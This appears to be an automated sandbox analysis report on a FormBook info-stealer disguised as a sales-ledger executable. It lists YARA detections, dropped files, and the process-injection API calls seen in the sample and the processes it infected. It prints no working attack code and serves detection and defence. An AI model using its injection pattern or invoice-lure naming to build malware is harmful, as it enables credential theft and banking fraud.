Source: cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/5
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0
Source: cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=05

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Detected FormBook malware

Show sources

Source: C:\Windows\SysWOW64\cmmon32.exe	Dropped file: C:\Users\user\AppData\Roaming\28L0N9-0\28Llogri.ini			Jump to dropped file
Source: C:\Windows\SysWOW64\cmmon32.exe	Dropped file: C:\Users\user\AppData\Roaming\28L0N9-0\28Llogrv.ini			Jump to dropped file

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0041A070 NtClose,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0041A120 NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_00419F40 NtCreateFile,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_00419FF0 NtReadFile,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0041A06C NtClose,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0041A11A NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01239910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012399A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01239860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01239840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012398F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01239A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01239A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01239A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01239540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012395D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01239710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012397A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01239780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01239660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012396E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01239950 NtQueueApcThread,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012399D0 NtCreateProcessEx,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01239820 NtEnumerateKey,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0123B040 NtSuspendThread,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012398A0 NtWriteVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01239B00 NtSetValueKey,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0123A3B0 NtGetContextThread,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01239A10 NtQuerySection,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01239A80 NtOpenDirectoryObject,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01239520 NtWaitForSingleObject,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0123AD30 NtSetContextThread,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01239560 NtWriteFile,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012395F0 NtQueryInformationFile,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01239730 NtQueryVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0123A710 NtOpenProcessToken,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01239760 NtOpenProcess,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0123A770 NtOpenThread,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01239770 NtSetInformationFile,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01239FE0 NtCreateMutant,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01239610 NtEnumerateValueKey,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01239670 NtQueryInformationProcess,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01239650 NtQueryValueKey,
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012396D0 NtCreateKey,
Source: C:\Windows\explorer.exe	Code function: 25_2_061C5A72 NtCreateFile,NtReadFile,NtClose,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D095D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D09540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D09560 NtWriteFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D096D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D096E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D09650 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D09660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D09610 NtEnumerateValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D09FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D09780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D09770 NtSetInformationFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D09710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D09840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D09860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D099A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D09910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D09A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D095F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D0AD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D09520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D09670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D097A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D0A770 NtOpenThread,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D09760 NtOpenProcess,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D0A710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D09730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D098F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D098A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D0B040 NtSuspendThread,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D09820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D099D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D09950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D09A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D09A10 NtQuerySection,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D09A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D09A20 NtResumeThread,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D0A3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D09B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_02B2A070 NtClose,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_02B2A120 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_02B29FF0 NtReadFile,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_02B29F40 NtCreateFile,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_02B2A06C NtClose,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_02B2A11A NtAllocateVirtualMemory,

Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Code function: 0_2_0057A5EC
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Code function: 0_2_01060640
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Code function: 0_2_010609AE
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Code function: 0_2_01061748
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Code function: 0_2_01061BE0
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Code function: 0_2_010617F9
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Code function: 0_2_04E200B8
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Code function: 0_2_04E20E60
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Code function: 0_2_04E20E70
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_00401030
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0041D905
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0041EB37
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0041E3A2
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0041E41B
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0041D4D0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0041DCBC
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_00409E40
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_00409E3E
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0041DF3F
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0041DFCD
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0078A5EC
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01214120
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011FF900
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012CE824
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012B1002
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012220A0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012C20A8
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0120B090
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012C28EC
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012C2B28
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0121AB40
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0122EBB0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012B03DA
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012BDBD2
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012AFA2B
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012C22AE
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012C2D07
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011F0D20
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012C1D55
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01222581
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0120D5E0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012C25DD
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0120841F
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012BD466
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012C1FF1
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012CDFCE
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01216E30
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012BD616
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012C2EF7
Source: C:\Windows\explorer.exe	Code function: 25_2_061C5A72
Source: C:\Windows\explorer.exe	Code function: 25_2_061C8ABB
Source: C:\Windows\explorer.exe	Code function: 25_2_061C0B20
Source: C:\Windows\explorer.exe	Code function: 25_2_061C0B22
Source: C:\Windows\explorer.exe	Code function: 25_2_061BC072
Source: C:\Windows\explorer.exe	Code function: 25_2_061BC06D
Source: C:\Windows\explorer.exe	Code function: 25_2_061C4882
Source: C:\Windows\explorer.exe	Code function: 25_2_061BDCF2
Source: C:\Windows\explorer.exe	Code function: 25_2_061BDCF0
Source: C:\Windows\explorer.exe	Code function: 25_2_061C3152
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D8D466
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CD841F
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D925DD
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CDD5E0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CF2581
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D91D55
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D92D07
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CC0D20
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D92EF7
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D8D616
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CE6E30
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D9DFCE
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D91FF1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D928EC
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CDB090
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CF20A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D920A8
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D81002
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D9E824
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CEA830
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CE99BF
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CCF900
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CE4120
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D922AE
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D7FA2B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D803DA
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D8DBD2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CFEBB0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CEAB40
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D92B28
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_02B2E3A2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_02B2EB37
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_02B19E3E
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_02B19E40
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_02B12FB0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_02B2E41B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_02B12D90

Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Code function: String function: 0040B550 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: String function: 011FB150 appears 48 times
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: String function: 04CCB150 appears 66 times

Source: Require your Sales Ledger from 01-April-2020.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Require your Sales Ledger from 01-April-2020.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Require your Sales Ledger from 01-April-2020.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Require your Sales Ledger from 01-April-2020.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AdvancedRun.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AdvancedRun.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Require your Sales Ledger from 01-April-2020.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Require your Sales Ledger from 01-April-2020.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Require your Sales Ledger from 01-April-2020.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Require your Sales Ledger from 01-April-2020.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.314971887.00000000029BF000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAdvancedRun.exe8 vs Require your Sales Ledger from 01-April-2020.exe
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.324334005.00000000076A0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSycdovrq.dll" vs Require your Sales Ledger from 01-April-2020.exe
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.324077435.0000000007520000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs Require your Sales Ledger from 01-April-2020.exe
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.313244216.0000000000598000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameBogxyjdq.exeH vs Require your Sales Ledger from 01-April-2020.exe
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp	Binary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X<>"°&<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs Require your Sales Ledger from 01-April-2020.exe
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.323803137.00000000074B0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs Require your Sales Ledger from 01-April-2020.exe
Source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000000.311950591.00000000007A8000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameBogxyjdq.exeH vs Require your Sales Ledger from 01-April-2020.exe
